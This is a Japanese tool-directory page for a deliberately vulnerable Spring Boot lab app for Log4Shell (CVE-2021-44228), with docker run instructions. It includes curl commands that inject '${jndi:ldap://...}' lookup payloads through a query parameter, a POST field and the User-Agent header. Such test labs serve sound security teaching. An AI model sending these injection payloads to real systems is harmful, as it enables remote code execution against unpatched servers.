Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
log4j2-vulnerable-spring-app — CVE-2021-44228 | Kitploit
ツール/GitHubGitHub/zzzz0317/log4j2-vulnerable-spring-app
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ラボと実践
GitHubzzzz0317/log4j2-vulnerable-spring-app

log4j2-vulnerable-spring-app

CVE-2021-44228

リポジトリを見る
44年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Log4j 2 CVE-2021-44228 テストサンプルアプリケーション

spring-boot-starter-log4j2:2.6.1 (log4j 2.14.1) ベース

利用可能なエンドポイント

エンドポイントリクエストメソッドパラメータ
vulnerable_request_getGETv=payload
vulnerable_request_postPOSTv=payload
vulnerable_request_header_uaGET / POSTHeader User-Agent

テスト可能

  • GET
root@kitploit:~
$ curl 'http://[targetIP]:8080/vulnerable_request_get?v=%24%7Bjndi%3Aldap%3A%2F%2F127.0.0.1%2Ffake%7D'
{"method":"vulnerable_request_get","payload":"${jndi:ldap://127.0.0.1/fake}"}
  • POST
root@kitploit:~
$ curl -X POST -F 'v=${jndi:ldap://127.0.0.1/fake}' 'http://[targetIP]:8080/vulnerable_request_post'
{"method":"vulnerable_request_post","payload":"${jndi:ldap://127.0.0.1/fake}"}
  • UserAgent
root@kitploit:~
$ curl 'http://[targetIP]:8080/vulnerable_request_header_ua' --user-agent '${jndi:ldap://127.0.0.1/fake}'
{"method":"vulnerable_request_header_ua","payload":"${jndi:ldap://127.0.0.1/fake}"}

クイックスタート

root@kitploit:~
docker run -p 8080:8080 ghcr.io/zzzz0317/log4j2-vulnerable-spring-app:latest

注:現在のイメージは openjdk:8u111-jdk ベースです

イメージのビルド

root@kitploit:~
docker build -t log4j2-vulnerable-spring-app:latest .
docker run -p 8080:8080 log4j2-vulnerable-spring-app:latest
ツールをダウンロード